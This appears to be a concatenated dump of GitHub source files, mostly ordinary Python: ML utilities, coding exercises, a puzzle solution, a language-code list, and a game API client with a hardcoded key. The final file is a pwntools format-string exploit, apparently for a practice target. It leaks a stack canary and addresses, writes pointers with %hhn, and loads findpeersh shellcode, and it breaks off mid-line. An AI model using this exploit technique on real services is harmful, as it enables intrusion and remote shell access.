+{"seq_id":"39012890662","text":"##game/status\nimport requests\nimport json\n\n### Key ###\napi = 'b5d5bd555a1501b7324a020b229f7acdbf52afdea9bc2d5f96a74cf6d2e94780'\n### playername ####\nname = 'pia'\n### uid ###\nid = '111113'\n\nstat = requests.get('http://20.196.214.79:5050/game/status?key={api}&playername={name}')\nprint(\"statusRequest:\", stat.content)\nprint(\"status :\", stat.status_code)\n\nview = requests.get(f'http://20.196.214.79:5050/game/view?key={api}&uid={id}')\nprint(\"viewRequest:\", view.content)\nprint(\"status :\", view.status_code)","repo_name":"Jaejuna/Tank_simulator","sub_path":"agents/status_view.py","file_name":"status_view.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72461207790","text":"def normalize(name):\n return list(map(fn, name))\n\ndef fn(s):\n return s[0].upper() + s[1:].lower()\n\n# 测试:\nL1 = ['adam', 'LISA', 'barT']\nL2 = normalize(L1)\nprint(L2)\n\n\n\nfrom functools import reduce\ndef prod(L):\n return reduce(lambda x,y:x*y, L)\n\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\nif prod([3, 5, 7, 9]) == 945:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\ndef str2float(s):\n x1 = s[:s.find('.')]\n y1 = s[s.find('.')+1:]\n print(x1,y1)\n x2 = reduce(lambda x,y:x*10+y, map(int,x1))\n y2 = reduce(lambda x,y:x*10+y, map(int,y1)) / (10**len(y1))\n print(x2, y2, x2+y2)\n return x2+y2\n\ndef str2float2(s):\n ss = s.split('.')\n print(ss,list(map(int,ss)))\n return reduce(lambda x,y:x+y/(10**len(ss[1])), map(int,ss)) \n\nresult = str2float2('123.456')\nprint('str2float(\\'123.456\\') =', result)\nif abs(result - 123.456) < 0.00001:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\n# 素数/质数\ndef _odd_iter():\n n = 1\n while True:\n n += 2\n yield n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\ndef primes():\n yield 2\n it = _odd_iter()\n while True:\n n = next(it)\n yield n\n it = filter(_not_divisible(n), it)\n\nfor n in primes():\n if n < 100:\n print(n)\n else:\n break\n\n\n# 回数 \ndef is_palindrome(n):\n return str(n) == str(n)[::-1]\n\n# 测试:\noutput = filter(is_palindrome, range(1, 200))\nprint('1~200:', list(output))\nif list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\nL = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\ndef by_name(t):\n return t[0].lower()\n \nL2 = sorted(L, key=by_name)\nprint(L2)\n","repo_name":"vectorxxxx/04-Python","sub_path":"04-函数式编程/函数式编程.py","file_name":"函数式编程.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1145004705","text":"import torch\r\nfrom torch.nn import init\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F \r\nimport functools\r\n\r\ndef load_state_dict(state_dict, net):\r\n model_dict = net.state_dict()\r\n\r\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict} \r\n\r\n for k, v in pretrained_dict.items(): \r\n if v.size() == model_dict[k].size():\r\n model_dict[k] = v\r\n\r\n not_initialized = set()\r\n \r\n for k, v in model_dict.items():\r\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\r\n not_initialized.add(k.split('.')[0])\r\n \r\n print('not initialized', sorted(not_initialized))\r\n net.load_state_dict(model_dict) \r\n\r\n return net\r\n \r\ndef conv3x3(in_planes, out_planes, strd=1, padding=1, bias=False):\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3,\r\n stride=strd, padding=padding, bias=bias)\r\n\r\ndef init_weights(net, init_type='normal', init_gain=0.02):\r\n def init_func(m): # define the initialization function\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\r\n if init_type == 'normal':\r\n init.normal_(m.weight.data, 0.0, init_gain)\r\n elif init_type == 'xavier':\r\n init.xavier_normal_(m.weight.data, gain=init_gain)\r\n elif init_type == 'kaiming':\r\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\r\n elif init_type == 'orthogonal':\r\n init.orthogonal_(m.weight.data, gain=init_gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n init.constant_(m.bias.data, 0.0)\r\n elif classname.find(\r\n 'BatchNorm2d') != -1:\r\n init.normal_(m.weight.data, 1.0, init_gain)\r\n init.constant_(m.bias.data, 0.0)\r\n\r\n print('initialize network with %s' % init_type)\r\n net.apply(init_func)\r\n\r\ndef init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[]):\r\n if len(gpu_ids) > 0:\r\n assert (torch.cuda.is_available())\r\n net.to(gpu_ids[0])\r\n net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs\r\n init_weights(net, init_type, init_gain=init_gain)\r\n return net\r\n\r\nclass CustomBCELoss(nn.Module):\r\n def __init__(self, brock=False, gamma=None):\r\n super(CustomBCELoss, self).__init__()\r\n self.brock = brock\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n x_hat = torch.clamp(pred, 1e-5, 1.0-1e-5) # prevent log(0) from happening\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n if self.brock:\r\n x = 3.0*gt - 1.0 # rescaled to [-1,2]\r\n\r\n loss = -(gamma*x*torch.log(x_hat) + (1.0-gamma)*(1.0-x)*torch.log(1.0-x_hat))\r\n else:\r\n loss = -(gamma*gt*torch.log(x_hat) + (1.0-gamma)*(1.0-gt)*torch.log(1.0-x_hat))\r\n\r\n if w is not None:\r\n if len(w.size()) == 1:\r\n w = w[:,None,None] \r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\nclass CustomMSELoss(nn.Module):\r\n def __init__(self, gamma=None):\r\n super(CustomMSELoss, self).__init__()\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n weight = gamma * gt + (1.0-gamma) * (1 - gt)\r\n loss = (weight * (pred - gt).pow(2)).mean()\r\n\r\n if w is not None:\r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\ndef createMLP(dims, norm='bn', activation='relu', last_op=nn.Tanh(), dropout=False):\r\n act = None\r\n if activation == 'relu':\r\n act = nn.ReLU()\r\n if activation == 'lrelu':\r\n act = nn.LeakyReLU()\r\n if activation == 'selu':\r\n act = nn.SELU()\r\n if activation == 'elu':\r\n act = nn.ELU()\r\n if activation == 'prelu':\r\n act = nn.PReLU()\r\n\r\n mlp = []\r\n for i in range(1,len(dims)):\r\n if norm == 'bn':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.BatchNorm1d(dims[i])]\r\n if norm == 'in':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.InstanceNorm1d(dims[i])]\r\n if norm == 'wn':\r\n mlp += [ nn.utils.weight_norm(nn.Linear(dims[i-1], dims[i]), name='weight')]\r\n if norm == 'none':\r\n mlp += [ nn.Linear(dims[i-1], dims[i])]\r\n \r\n if i != len(dims)-1:\r\n if act is not None:\r\n mlp += [act]\r\n if dropout:\r\n mlp += [nn.Dropout(0.2)]\r\n\r\n if last_op is not None:\r\n mlp += [last_op]\r\n\r\n return mlp","repo_name":"Abhilash23x/project_model","sub_path":"lib/net_util.py","file_name":"net_util.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"31808782925","text":"\"\"\"\nAssert that the CycleGan model is imported correctly\n\"\"\"\nimport unittest\nimport torch\nimport os\nfrom models.CycleGan import CycleGan\n\ndef numel(net):\n return sum(p.numel() for p in net.parameters())\n\nnet = CycleGan()\n\nclass TestCycleGan(unittest.TestCase):\n def test_cg_nparams(self): \n nparams = numel(net)\n self.assertEqual(nparams, 14142916 * 2)\n \n def test_cg_output_shape(self):\n dirname = os.path.dirname(__file__)\n filename = dirname + '/test_files/input.pt'\n x = torch.load(filename)\n bsize = x.shape[0]\n\n with torch.no_grad():\n y1 = net.genX(x)\n self.assertEqual(y1.shape, (bsize, 3, 256, 256))\n\n y2 = net.genY(x)\n self.assertEqual(y2.shape, (bsize, 3, 256, 256))\n \n z1 = net.disY(y1)\n self.assertEqual(z1.shape, (bsize, 1, 30, 30))\n \n z2 = net.disX(y2)\n self.assertEqual(z2.shape, (bsize, 1, 30, 30))\n \n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"deepakhr1999/cyclegans","sub_path":"test/test_cyclegan.py","file_name":"test_cyclegan.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"23957175802","text":"def get_coords():\n with open(\"input\") as f:\n return [tuple([int(x.strip()) for x in x.split(\",\")]) for x in f.read().split(\"\\n\") if len(x) > 0]\n\ndef manhattan_dist(sx, sy, ex, ey):\n return abs(sx - ex) + abs(sy - ey)\n\ndef fill_grid(coords):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n\n grid = [[dict() for x in range(max_x)] for y in range(max_y)]\n\n for (idx, (x, y)) in enumerate(coords):\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n grid[gy][gx][idx] = manhattan_dist(x, y, gx, gy)\n\n return grid\n\ndef get_grid_ids(grid):\n res = grid\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n min_dist = min(grid[gy][gx].values())\n if list(grid[gy][gx].values()).count(min_dist) > 1:\n res[gy][gx] = None\n else:\n res[gy][gx] = [idx for (idx, x) in grid[gy][gx].items() if x == min_dist][0]\n return res\n\ndef get_infinites(grid):\n borders = set()\n for x in grid[0]:\n if x is not None:\n borders.add(x)\n for x in grid[-1]:\n if x is not None:\n borders.add(x)\n for y in grid:\n if y[0] is not None:\n borders.add(y[0])\n if y[-1] is not None:\n borders.add(y[-1])\n\n return borders\n\ndef count_idx(grid, idx):\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] == idx:\n count += 1\n return count\n\ndef get_biggest_region_idx(coords, grid, infinites):\n res = list()\n for (idx, (x, y)) in enumerate(coords):\n if idx in infinites:\n continue\n res.append((idx, count_idx(grid, idx)))\n return max(res, key=lambda x: x[1])\n\ndef get_grid_max_dist_region_size(coords, max_dist):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n grid = [[0 for x in range(max_x)] for y in range(max_y)]\n\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n for (x, y) in coords:\n grid[gy][gx] += manhattan_dist(x, y, gx, gy)\n\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] < max_dist:\n count += 1\n return count\n\ndef run():\n coords = get_coords()\n\n # Get a grid with each item marked with the co-ordinate ID and the\n # Manhattan distance to each cell within the grid\n grid = fill_grid(coords)\n\n # Conver each item in the grid to the ID of the co-ordinate that is closest\n grid_ids = get_grid_ids(grid)\n\n # Get a set of all co-ordinate IDs for co-ordinate regions that are\n # infinitely large (i.e. are against the border)\n infinite_items = get_infinites(grid_ids)\n\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)[1]\n )\n )\n\n print(\n \"The size of the region which is at least 10,000 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 10000)\n )\n )\n\ndef run_test():\n coords = [(1, 1), (1, 6), (8, 3), (3, 4), (5, 5), (8, 9)]\n grid = fill_grid(coords)\n grid_ids = get_grid_ids(grid)\n print(grid_ids)\n infinite_items = get_infinites(grid_ids)\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)\n )\n )\n print(\n \"The size of the region which is at least 32 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 32)\n )\n )\n\nrun()\n#run_test()\n","repo_name":"polaris64/advent-of-code","sub_path":"2018/06/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"21790571792","text":"\"\"\"\nthis script equalizes the mean and std of the convolutions of a VGG network.\nIt is used to make the VGG network used in the Gatys et al. style transfer\npaper to be compatible with the VGG network used in the Johnson et al. paper.\nIt equalizes the contribution of each layer to the loss.\n\n./stylevgg \n\n must be a constructor in torchelie.models\n\"\"\"\nimport torch\nfrom torchelie.datasets import FastImageFolder\nimport torchvision.transforms as TF\nimport torchelie.models as tchm\nimport torchelie as tch\nimport sys\n\ntorch.autograd.set_grad_enabled(False)\n\nimagenet_path = sys.argv[2]\n\nmodel = sys.argv[1]\nm = tchm.__dict__[model](1000, pretrained='classification/imagenet')\ndel m.classifier\nm.cuda()\nm.eval()\n\nds = FastImageFolder(imagenet_path,\n transform=TF.Compose([\n TF.Resize(256),\n TF.CenterCrop(224),\n TF.ToTensor(),\n tch.nn.ImageNetInputNorm()\n ]))\n\nbatches = [\n b[0] for _, b in zip(\n range(200), torch.utils.data.DataLoader(\n ds, batch_size=320, shuffle=True))\n]\n\nbatch = batches[0].cuda()\n\n\ndef flatvgg():\n layers = []\n\n def _rec(m):\n if len(list(m.children())) == 0:\n layers.append(m)\n else:\n for mm in m.children():\n _rec(mm)\n\n _rec(m.features)\n return torch.nn.Sequential(*layers)\n\n\nidxs = [\n i for i, nm in enumerate(dict(m.features.named_children()).keys())\n if 'conv' in nm\n]\nflat = flatvgg()\n\nflatidxs = [i for i, l in enumerate(flat) if isinstance(l, torch.nn.Conv2d)]\nprint(flatidxs)\n#flatidxs.append(len(flat))\nprint(dict(m.features.named_children()).keys())\n\nprint('before')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nprev_mean = torch.tensor([1, 1, 1]).cuda()\nfor i in range(len(flatidxs)):\n print('computing', i)\n ms = []\n for b in batches:\n with torch.cuda.amp.autocast():\n out = flat[:flatidxs[i] + 2](b.cuda())\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n ms.append(mean)\n mean = torch.stack(ms, dim=0).mean(0).cuda()\n flat[flatidxs[i]].weight.data *= (prev_mean[None, :, None, None]\n / mean[:, None, None, None])\n flat[flatidxs[i]].bias.data /= mean\n prev_mean = mean\n\nprint('after')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nref = tchm.__dict__[model](\n 1000, pretrained='classification/imagenet').features.cuda()(batch[:128])\nprint((m.features(batch[:128])\n - ref / prev_mean[None, :, None, None]).abs().mean().item())\ntorch.save(m.state_dict(), f'{model}.pth')\n","repo_name":"Vermeille/Torchelie","sub_path":"scripts/stylevgg.py","file_name":"stylevgg.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"38"}
+{"seq_id":"43464708948","text":"#支持向量回归机预测(径向基函数)\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import svm\n\ndataset = pd.read_csv('data_wp.csv')\ndata_input = dataset.iloc[:,:-1].values/1000 \ndata_output = dataset.loc[:,['pt']].values/1000 \ntrainlen = int(len(data_input)*0.8) \ntestlen = int(len(data_input)-trainlen) \n\nX_train = data_input[:trainlen].reshape(trainlen,-1) \ny_train = data_output[:trainlen].reshape(trainlen,1) \nX_test = data_input[trainlen:].reshape(testlen,-1) \ny_test = data_output[trainlen:].reshape(testlen,1) \n\nmodel_svm = svm.SVR(kernel='rbf')\nmodel_svm.fit(X_train,y_train)\npred = model_svm.predict(X_test)\n\nplt.figure(figsize=(12,18))\nplt.subplot(211)\nplt.plot(y_test,color='r')\nplt.plot(pred,color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.subplot(212)\nplt.plot(y_test[150:300],color='r')\nplt.plot(pred[150:300],color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.tight_layout()\nplt.show()","repo_name":"aduxhi/learnpython","sub_path":"load_pre2.py","file_name":"load_pre2.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18609264806","text":"# This is the list of language codes with the 'modern' level of support in CLDR\n# (compared to 'full', which contains many more languages). We use this as the\n# list of languages that we store specific name-to-code mappings for.\n\nCLDR_LANGUAGES = {\n 'af',\n 'am',\n 'ar',\n 'az',\n 'be',\n 'bg',\n 'bn',\n 'bs',\n 'ca',\n 'cs',\n 'cy',\n 'da',\n 'de',\n 'el',\n 'en',\n 'es',\n 'et',\n 'eu',\n 'fa',\n 'fi',\n 'fil',\n 'fo',\n 'fr',\n 'ga',\n 'gl',\n 'gu',\n 'he',\n 'hi',\n 'hr',\n 'hu',\n 'hy',\n 'id',\n 'is',\n 'it',\n 'ja',\n 'ka',\n 'kk',\n 'km',\n 'kn',\n 'ko',\n 'ky',\n 'lo',\n 'lt',\n 'lv',\n 'mk',\n 'ml',\n 'mn',\n 'mr',\n 'ms',\n 'my',\n 'nb',\n 'ne',\n 'nl',\n 'pa',\n 'pl',\n 'pt',\n 'ro',\n 'ru',\n 'si',\n 'sk',\n 'sl',\n 'sq',\n 'sr',\n 'sv',\n 'sw',\n 'ta',\n 'te',\n 'th',\n 'ti',\n 'to',\n 'tr',\n 'uk',\n 'und',\n 'ur',\n 'uz',\n 'vi',\n 'yue',\n 'zh',\n 'zu',\n}\n\n\n# These are the names languages that have the most entries on the English and\n# German Wiktionaries. Wiktionary only consistently identifies languages by their\n# name, making it important to be able to recognize the names.\n#\n# These lists of names are used in `tests/test_wikt_languages.py`.\nWIKT_LANGUAGE_NAMES = {}\n\nWIKT_LANGUAGE_NAMES['en'] = [\n \"Spanish\",\n \"French\",\n \"Latvian\",\n \"Latin\",\n \"English\",\n \"Mandarin\",\n \"Italian\",\n \"Portuguese\",\n \"Cantonese\",\n \"Japanese\",\n \"German\",\n \"Swedish\",\n \"Korean\",\n \"Serbo-Croatian\",\n \"Serbian\",\n \"Croatian\",\n \"Bosnian\",\n \"Finnish\",\n \"Vietnamese\",\n \"Dutch\",\n \"Galician\",\n \"Catalan\",\n \"Polish\",\n \"Danish\",\n \"Norwegian Nynorsk\",\n \"Turkish\",\n \"Romanian\",\n \"Lithuanian\",\n \"Ido\",\n \"Old French\",\n \"Czech\",\n \"Norwegian\",\n # Jèrriais -- same as Norman\n \"Esperanto\",\n \"Icelandic\",\n # Old Armenian\n \"Norwegian Bokmål\",\n \"Asturian\",\n \"Hungarian\",\n \"Proto-Germanic\",\n \"Russian\",\n \"Slovene\",\n \"Min Nan\",\n \"Scottish Gaelic\",\n \"Greek\",\n \"Irish\",\n \"Lojban\",\n \"Middle French\",\n \"Malay\",\n \"Luxembourgish\",\n \"Slovak\",\n \"Estonian\",\n \"Persian\",\n \"Venetian\",\n \"Old English\",\n \"Volapük\",\n \"Ladin\",\n \"Faroese\",\n \"Scots\",\n \"Interlingua\",\n \"Romansch\",\n \"Urdu\",\n # Middle Chinese\n \"Indonesian\",\n \"Swahili\",\n \"Middle English\",\n \"Occitan\",\n \"Welsh\",\n \"Old Norse\",\n \"Albanian\",\n \"Old Irish\",\n \"Old Saxon\",\n \"Lower Sorbian\",\n \"Afrikaans\",\n \"Ukrainian\",\n \"Proto-Slavic\",\n \"Ancient Greek\",\n \"Gothic\",\n \"Hawaiian\",\n \"Kurdish\",\n \"Tagalog\",\n \"Old High German\",\n \"Crimean Tatar\",\n \"Manx\",\n \"Sanskrit\",\n \"Hiligaynon\",\n \"West Frisian\",\n \"Hebrew\",\n \"Tok Pisin\",\n \"Proto-Indo-European\",\n \"Macedonian\",\n \"Novial\",\n \"Armenian\",\n \"Arabic\",\n \"Maltese\",\n \"Hakka\",\n \"Sicilian\",\n \"Ladino\",\n \"Basque\",\n \"Breton\",\n # Guernésiais -- same as Norman\n \"Vai\",\n \"Navajo\",\n \"Azeri\",\n \"Vilamovian\",\n # Tarantino\n \"Maori\",\n \"Friulian\",\n \"Hausa\",\n \"Haitian Creole\",\n \"Yiddish\",\n \"Tatar\",\n \"Proto-Malayo-Polynesian\",\n \"Aromanian\",\n \"Ottoman Turkish\",\n \"Old Provençal\",\n \"Northern Sami\",\n \"Dalmatian\",\n \"Bulgarian\",\n \"Neapolitan\",\n \"Cornish\",\n \"Middle Dutch\",\n \"Rapa Nui\",\n # Old Portuguese\n \"Egyptian Arabic\",\n \"Romani\",\n \"Tahitian\",\n \"Thai\",\n \"Limburgish\",\n \"Karelian\",\n \"Tajik\",\n \"Turkmen\",\n \"Kabardian\",\n \"Uzbek\",\n \"Samoan\",\n \"Mongolian\",\n \"Zulu\",\n \"Upper Sorbian\",\n \"Walloon\",\n # Proto-Finnic\n \"Frankish\",\n \"Mapudungun\",\n \"Pashto\",\n \"Low German\",\n \"Bashkir\",\n \"Kashubian\",\n \"Sranan Tongo\",\n \"Proto-Sino-Tibetan\",\n \"Norman\",\n \"Proto-Austronesian\",\n \"Marathi\",\n \"Rohingya\",\n \"Classical Nahuatl\",\n # Proto-Malayic\n # German Low German\n \"Fijian\",\n \"Zazaki\",\n \"Proto-Italic\",\n \"Old Dutch\",\n \"Egyptian\",\n \"Old Frisian\",\n \"Greenlandic\",\n \"Burmese\",\n \"Votic\",\n \"Ewe\",\n \"Cherokee\",\n \"Old Church Slavonic\",\n \"Quechua\",\n \"Mirandese\",\n \"Livonian\",\n \"Bengali\",\n \"Skolt Sami\",\n # Proto-Balto-Slavic\n \"Pitjantjatjara\",\n \"Georgian\",\n \"North Frisian\",\n \"Tetum\",\n \"Tongan\",\n # Mauritian Creole\n \"Torres Strait Creole\",\n \"Papiamentu\",\n \"Lao\",\n \"Malagasy\",\n \"Interlingue\",\n \"Aragonese\",\n \"Istriot\",\n \"Sumerian\",\n \"Proto-Celtic\",\n \"Võro\",\n # Proto-Polynesian\n \"Nepali\",\n \"Chickasaw\",\n \"Akkadian\",\n \"Middle Armenian\",\n \"Cimbrian\",\n \"Somali\",\n \"Sardinian\",\n \"Tocharian B\",\n \"Telugu\",\n \"Javanese\",\n \"Taos\",\n \"Proto-Semitic\",\n # Old Prussian\n \"Kyrgyz\",\n \"Corsican\",\n \"Veps\",\n \"Baluchi\",\n \"Middle Low German\",\n \"Middle High German\",\n \"Uyghur\",\n # Dutch Low Saxon\n \"Belarusian\",\n \"Guaraní\",\n \"Undetermined\",\n \"Inuktitut\",\n \"Tocharian A\",\n \"Nigerian Pidgin\",\n # Gallo\n # Saterland Frisian\n \"Punjabi\",\n \"Proto-Algonquian\",\n # Istro-Romanian\n \"Wiradhuri\",\n \"Sichuan Yi\",\n \"Wu\",\n # White Hmong\n \"Ugaritic\",\n \"Sundanese\",\n # Old East Slavic\n # Fala\n # Elfdalian\n \"Tamil\",\n \"Pijin\",\n \"Okinawan\",\n \"Kazakh\",\n \"Hindi\",\n \"Tuvan\",\n \"Polabian\",\n \"Aramaic\",\n \"Malayalam\",\n \"Kumyk\",\n \"Inari Sami\",\n \"Ilocano\",\n \"Tswana\",\n \"Libyan Arabic\",\n \"Latgalian\",\n \"Yakut\",\n \"Sindhi\",\n \"Khmer\",\n \"Gamilaraay\",\n \"Ojibwe\",\n \"Choctaw\",\n \"Chinese\",\n \"Chamorro\",\n \"Yucatec Maya\",\n \"Picard\",\n \"Ngarrindjeri\",\n \"Kott\",\n \"Ingrian\",\n # Crimean Gothic\n \"Chamicuro\",\n \"Rajasthani\",\n # Old Tupi\n \"Old Spanish\",\n \"Gagauz\",\n \"Extremaduran\",\n \"Chinook Jargon\",\n \"Cahuilla\",\n \"Kannada\",\n \"Iban\",\n \"American Sign Language\",\n \"Adyghe\",\n \"Warlpiri\",\n \"Tibetan\",\n \"Ossetian\",\n \"Meriam\",\n \"Marshallese\",\n \"Khakas\",\n \"Balinese\",\n \"Zhuang\",\n \"Tuvaluan\",\n \"Niuean\",\n \"Martuthunira\",\n \"Guugu Yimidhirr\",\n \"Chechen\",\n \"Campidanese Sardinian\",\n \"Tolai\",\n # Old Javanese\n \"Nahuatl\",\n \"Lombard\",\n \"West Coast Bajau\",\n \"Romagnol\",\n \"Middle Irish\",\n \"Yoruba\",\n \"Wangaaybuwan-Ngiyambaa\",\n # Old Swedish\n \"Lingala\",\n \"Fiji Hindi\",\n \"Shabo\",\n \"Sasak\",\n \"Judeo-Arabic\",\n \"Central Kurdish\",\n \"Bislama\",\n]\n\nWIKT_LANGUAGE_NAMES['de'] = [\n \"Deutsch\",\n \"Englisch\",\n \"Polnisch\",\n \"Italienisch\",\n \"Französisch\",\n \"Esperanto\",\n \"Schwedisch\",\n \"Lateinisch\",\n \"Tschechisch\",\n \"Katalanisch\",\n \"Spanisch\",\n \"Okzitanisch\",\n \"Ungarisch\",\n \"Litauisch\",\n \"Finnisch\",\n \"Russisch\",\n \"Altgriechisch\",\n \"Niederländisch\",\n \"Kurdisch\",\n \"Baskisch\",\n \"Armenisch\",\n \"Isländisch\",\n \"Bulgarisch\",\n \"Färöisch\",\n \"Dänisch\",\n \"Portugiesisch\",\n \"Slowakisch\",\n \"Türkisch\",\n \"Maori\",\n \"Albanisch\",\n \"Japanisch\",\n \"Norwegisch\",\n \"Irisch\",\n \"Koreanisch\",\n \"Chinesisch\",\n \"Venezianisch\",\n \"Friaulisch\",\n \"Serbisch\",\n \"Indonesisch\",\n \"Walisisch\",\n \"Arabisch\",\n \"Zentral-Nahuatl\",\n \"Neugriechisch\",\n \"Sumerisch\",\n \"Obersorbisch\",\n \"Sesotho\",\n \"Rumänisch\",\n \"Suaheli\",\n \"Persisch\",\n \"Krimtatarisch\",\n \"Plattdeutsch\",\n \"Prußisch\",\n \"Thai\",\n \"Bosnisch\",\n \"Sardisch\",\n \"Maltesisch\",\n \"Akkadisch\",\n \"Hawaiianisch\",\n \"Hebräisch\",\n \"Gotisch\",\n \"Afrikaans\",\n \"Rätoromanisch\",\n \"Tamil\",\n \"Bretonisch\",\n \"Ukrainisch\",\n \"Hindi\",\n \"Georgisch\",\n \"Panjabi\",\n \"Papiamentu\",\n \"Slowenisch\",\n \"Nauruisch\",\n \"Schottisch-Gälisch\",\n \"Balinesisch\",\n \"Estnisch\",\n \"Manx\",\n \"Korsisch\",\n # \"Frühneuhochdeutsch\",\n \"Lettisch\",\n \"isiZulu\",\n \"Tagalog\",\n \"Tok Pisin\",\n # \"Südpikenisch\",\n \"Kroatisch\",\n \"Niedersorbisch\",\n \"Kannada\",\n \"Guanche\",\n \"Weißrussisch\",\n \"Sanskrit\",\n \"Aserbaidschanisch\",\n \"Mittelhochdeutsch\",\n \"Laotisch\",\n \"Altnordisch\",\n \"Altenglisch\",\n \"Vietnamesisch\",\n \"Tadschikisch\",\n \"Samoanisch\",\n \"Mazedonisch\",\n \"Luxemburgisch\",\n \"Hethitisch\",\n # \"Yukatekisch\",\n \"Kaschubisch\",\n \"Wallonisch\",\n # \"Klassisches Nahuatl\",\n \"Telugu\",\n \"Rapanui\",\n \"Jiddisch\",\n \"Ido\",\n # \"Galicisch\",\n \"Volapük\",\n \"Bengalisch\",\n \"Mapudungun\",\n \"Lojban\",\n \"Tuvaluisch\",\n \"Gujarati\",\n \"Assamesisch\",\n]\n","repo_name":"SickGear/SickGear","sub_path":"lib/langcodes/language_lists.py","file_name":"language_lists.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"38"}
+{"seq_id":"2881625826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\n\ncontext(arch=\"i386\", os=\"linux\")\n\nSHELLCODE = asm(shellcraft.findpeersh())\n\nr = remote('localhost', 20002)\nr.readline()\n\n# Canary = %134$\n# ebp (0xffd2da98) = %137$\n# ret addr (0x56557d4b) = %138$\n# socket = %139$\n\n# fmt base (0x56557000) = ret_addr - 0xd4b\n# buffer addr (0xffd2d86c) = ebp - 556\n# addr of ret (0xffd2da7c) = ebp - 28\n\nr.sendline(flat(\n '%134$08x', # Canary\n '%137$08x', # EBP1\n '%138$08x', # ret addr\n '%139$08x', # socket\n '%145$08x', # EBP2\n '%157$08x' # EBP3\n))\n\ncanary = int(r.recv(8), 16)\nebp1 = int(r.recv(8), 16)\nret = int(r.recv(8), 16)\nsocket = int(r.recv(8), 16)\nebp2 = int(r.recv(8), 16)\nebp3 = int(r.recv(8), 16)\nfmt_base = ret - 0xd4b\nbuffer = ebp1 - 556\nret_addr = ebp1 - 28\nr.recvline()\n\ndef send_receive(fmt):\n r.sendline(fmt)\n return r.recvline()\n\ndef make_pointer(addr):\n send_receive('A' * ((ebp2 & 0xff) + 0) + '%137$hhn')\n send_receive('A' * ((addr >> 0) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 1) + 